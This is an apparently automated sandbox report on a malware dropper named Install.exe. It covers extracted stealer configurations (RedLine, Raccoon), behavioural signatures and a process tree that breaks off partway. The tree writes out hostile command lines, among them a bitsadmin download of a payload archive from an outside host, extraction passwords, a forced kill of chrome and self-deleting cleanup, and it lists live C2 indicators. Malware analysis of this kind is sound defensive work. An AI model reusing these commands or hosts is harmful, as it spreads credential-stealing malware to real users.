Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    292s
  • max time network
    1609s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    28-04-2021 04:33

General

Malware Config

Extracted

Family

redline

Botnet

EUU

C2

download3.info:80

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Signatures

  • BlackNET

    BlackNET is an open source remote access tool written in VB.NET.

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 52 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 28 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 12 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2632
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2624
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:2616
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2364
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2324
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1848
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1404
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1248
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1204
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1096
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1044
                    • C:\Users\Admin\AppData\Roaming\ehhddig
                      C:\Users\Admin\AppData\Roaming\ehhddig
                      2⤵
                        PID:3680
                      • C:\Users\Admin\AppData\Roaming\buhddig
                        C:\Users\Admin\AppData\Roaming\buhddig
                        2⤵
                          PID:5732
                          • C:\Users\Admin\AppData\Roaming\buhddig
                            C:\Users\Admin\AppData\Roaming\buhddig
                            3⤵
                              PID:4220
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:64
                          • C:\Users\Admin\AppData\Local\Temp\Install.exe
                            "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:640
                            • C:\Users\Admin\AppData\Local\Temp\is-GDRD7.tmp\Install.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-GDRD7.tmp\Install.tmp" /SL5="$90030,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                              2⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of WriteProcessMemory
                              PID:4000
                              • C:\Users\Admin\AppData\Local\Temp\is-JN3EE.tmp\Ultra.exe
                                "C:\Users\Admin\AppData\Local\Temp\is-JN3EE.tmp\Ultra.exe" /S /UID=burnerch1
                                3⤵
                                • Drops file in Drivers directory
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Drops file in Program Files directory
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:2588
                                • C:\Program Files\MSBuild\DLSANVFBHV\ultramediaburner.exe
                                  "C:\Program Files\MSBuild\DLSANVFBHV\ultramediaburner.exe" /VERYSILENT
                                  4⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:768
                                  • C:\Users\Admin\AppData\Local\Temp\is-BJ709.tmp\ultramediaburner.tmp
                                    "C:\Users\Admin\AppData\Local\Temp\is-BJ709.tmp\ultramediaburner.tmp" /SL5="$40038,281924,62464,C:\Program Files\MSBuild\DLSANVFBHV\ultramediaburner.exe" /VERYSILENT
                                    5⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of WriteProcessMemory
                                    PID:3296
                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                      6⤵
                                      • Executes dropped EXE
                                      PID:3492
                                • C:\Users\Admin\AppData\Local\Temp\94-b770b-406-66391-4d5461f205122\Jaledosobae.exe
                                  "C:\Users\Admin\AppData\Local\Temp\94-b770b-406-66391-4d5461f205122\Jaledosobae.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  • Modifies system certificate store
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2236
                                • C:\Users\Admin\AppData\Local\Temp\63-9502c-ab5-14e96-c26fe90d6a5f1\Myshobidesi.exe
                                  "C:\Users\Admin\AppData\Local\Temp\63-9502c-ab5-14e96-c26fe90d6a5f1\Myshobidesi.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:2104
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5gkzaa5n.0ax\skipper.exe /s & exit
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:4112
                                    • C:\Users\Admin\AppData\Local\Temp\5gkzaa5n.0ax\skipper.exe
                                      C:\Users\Admin\AppData\Local\Temp\5gkzaa5n.0ax\skipper.exe /s
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:4336
                                      • C:\Users\Admin\AppData\Local\Temp\799243794.exe
                                        C:\Users\Admin\AppData\Local\Temp\799243794.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5116
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          8⤵
                                            PID:5456
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            8⤵
                                              PID:5296
                                          • C:\Users\Admin\AppData\Local\Temp\835088515.exe
                                            C:\Users\Admin\AppData\Local\Temp\835088515.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:5232
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              8⤵
                                                PID:5888
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\5gkzaa5n.0ax\skipper.exe & exit
                                              7⤵
                                                PID:2244
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 0
                                                  8⤵
                                                  • Runs ping.exe
                                                  PID:5624
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wscwviuw.y5e\001.exe & exit
                                            5⤵
                                              PID:4424
                                              • C:\Users\Admin\AppData\Local\Temp\wscwviuw.y5e\001.exe
                                                C:\Users\Admin\AppData\Local\Temp\wscwviuw.y5e\001.exe
                                                6⤵
                                                  PID:4612
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rdvqv4fg.mjt\gpooe.exe & exit
                                                5⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:4860
                                                • C:\Users\Admin\AppData\Local\Temp\rdvqv4fg.mjt\gpooe.exe
                                                  C:\Users\Admin\AppData\Local\Temp\rdvqv4fg.mjt\gpooe.exe
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:4992
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5076
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:3864
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                      PID:4384
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ny4o1uwc.xe4\google-game.exe & exit
                                                  5⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2984
                                                  • C:\Users\Admin\AppData\Local\Temp\ny4o1uwc.xe4\google-game.exe
                                                    C:\Users\Admin\AppData\Local\Temp\ny4o1uwc.xe4\google-game.exe
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Drops file in Program Files directory
                                                    • Suspicious use of SetWindowsHookEx
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:4304
                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                      7⤵
                                                      • Loads dropped DLL
                                                      • Modifies registry class
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:4872
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kwhvw23h.3nd\md1_1eaf.exe & exit
                                                  5⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:4428
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    6⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:4424
                                                  • C:\Users\Admin\AppData\Local\Temp\kwhvw23h.3nd\md1_1eaf.exe
                                                    C:\Users\Admin\AppData\Local\Temp\kwhvw23h.3nd\md1_1eaf.exe
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Checks whether UAC is enabled
                                                    PID:5000
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0l5qixji.ppp\HookSetp.exe /silent & exit
                                                  5⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:4884
                                                  • C:\Users\Admin\AppData\Local\Temp\0l5qixji.ppp\HookSetp.exe
                                                    C:\Users\Admin\AppData\Local\Temp\0l5qixji.ppp\HookSetp.exe /silent
                                                    6⤵
                                                      PID:4592
                                                      • C:\Users\Admin\AppData\Roaming\4406372.exe
                                                        "C:\Users\Admin\AppData\Roaming\4406372.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5696
                                                      • C:\Users\Admin\AppData\Roaming\7529954.exe
                                                        "C:\Users\Admin\AppData\Roaming\7529954.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        PID:5788
                                                        • C:\ProgramData\Windows Host\Windows Host.exe
                                                          "C:\ProgramData\Windows Host\Windows Host.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:4948
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ir1nktnr.pd5\askinstall39.exe & exit
                                                    5⤵
                                                      PID:5472
                                                      • C:\Users\Admin\AppData\Local\Temp\ir1nktnr.pd5\askinstall39.exe
                                                        C:\Users\Admin\AppData\Local\Temp\ir1nktnr.pd5\askinstall39.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:5620
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                          7⤵
                                                            PID:3136
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /f /im chrome.exe
                                                              8⤵
                                                              • Kills process with taskkill
                                                              PID:5548
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xsjgabo4.xqf\y1.exe & exit
                                                        5⤵
                                                          PID:6036
                                                          • C:\Users\Admin\AppData\Local\Temp\xsjgabo4.xqf\y1.exe
                                                            C:\Users\Admin\AppData\Local\Temp\xsjgabo4.xqf\y1.exe
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            PID:2060
                                                            • C:\Users\Admin\AppData\Local\Temp\9Ul6jvL41v.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\9Ul6jvL41v.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Modifies system certificate store
                                                              PID:4384
                                                              • C:\Users\Admin\AppData\Roaming\1619591998061.exe
                                                                "C:\Users\Admin\AppData\Roaming\1619591998061.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619591998061.txt"
                                                                8⤵
                                                                  PID:4952
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\9Ul6jvL41v.exe"
                                                                  8⤵
                                                                    PID:5928
                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                      ping 127.0.0.1 -n 3
                                                                      9⤵
                                                                      • Runs ping.exe
                                                                      PID:4724
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\xsjgabo4.xqf\y1.exe"
                                                                  7⤵
                                                                    PID:1232
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /T 10 /NOBREAK
                                                                      8⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:4876
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cpnb5dry.gae\requête.exe & exit
                                                                5⤵
                                                                  PID:4264
                                                                  • C:\Users\Admin\AppData\Local\Temp\cpnb5dry.gae\requête.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\cpnb5dry.gae\requête.exe
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:5904
                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
                                                                      7⤵
                                                                        PID:1156
                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                                          parse.exe -f json -b chrome
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:4960
                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                                          parse.exe -f json -b edge
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:4952
                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                                          parse.exe -f json -b firefox
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:5668
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rx44xrlx.f4m\SunLabsPlayer.exe /S & exit
                                                                    5⤵
                                                                      PID:5816
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4592
                                                                      • C:\Users\Admin\AppData\Local\Temp\rx44xrlx.f4m\SunLabsPlayer.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\rx44xrlx.f4m\SunLabsPlayer.exe /S
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Drops file in Program Files directory
                                                                        PID:4844
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:5856
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:4256
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:4432
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:5476
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:5096
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:192
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                      • Checks for any installed AV software in registry
                                                                                      PID:4840
                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                      7⤵
                                                                                      • Download via BitsAdmin
                                                                                      PID:5956
                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pLZQiSM75KRmgEsZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in Program Files directory
                                                                                      PID:5304
                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -plIt7BMSl5CGLPUK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5536
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:5704
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:4988
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:4276
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                                          7⤵
                                                                                            PID:3728
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                                            7⤵
                                                                                              PID:5740
                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                                              7⤵
                                                                                                PID:5604
                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                                                  8⤵
                                                                                                    PID:5324
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                    PID:6016
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                                                    7⤵
                                                                                                      PID:4476
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                                                      7⤵
                                                                                                        PID:5700
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                                                        7⤵
                                                                                                          PID:884
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw686.tmp\tempfile.ps1"
                                                                                                          7⤵
                                                                                                            PID:2868
                                                                                                          • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                            "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                            7⤵
                                                                                                              PID:5268
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\odrmkwmm.13x\005.exe & exit
                                                                                                          5⤵
                                                                                                            PID:3140
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\odrmkwmm.13x\005.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\odrmkwmm.13x\005.exe
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4504
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\anhetebc.c3z\GcleanerWW.exe /mixone & exit
                                                                                                            5⤵
                                                                                                              PID:5668
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xz33ezsq.bad\toolspab1.exe & exit
                                                                                                              5⤵
                                                                                                                PID:4328
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\xz33ezsq.bad\toolspab1.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\xz33ezsq.bad\toolspab1.exe
                                                                                                                  6⤵
                                                                                                                    PID:4988
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\xz33ezsq.bad\toolspab1.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\xz33ezsq.bad\toolspab1.exe
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:4604
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ynsrwckk.s54\c7ae36fa.exe & exit
                                                                                                                  5⤵
                                                                                                                    PID:5400
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ynsrwckk.s54\c7ae36fa.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\ynsrwckk.s54\c7ae36fa.exe
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:4808
                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                            1⤵
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:1072
                                                                                                            • C:\Windows\system32\svchost.exe
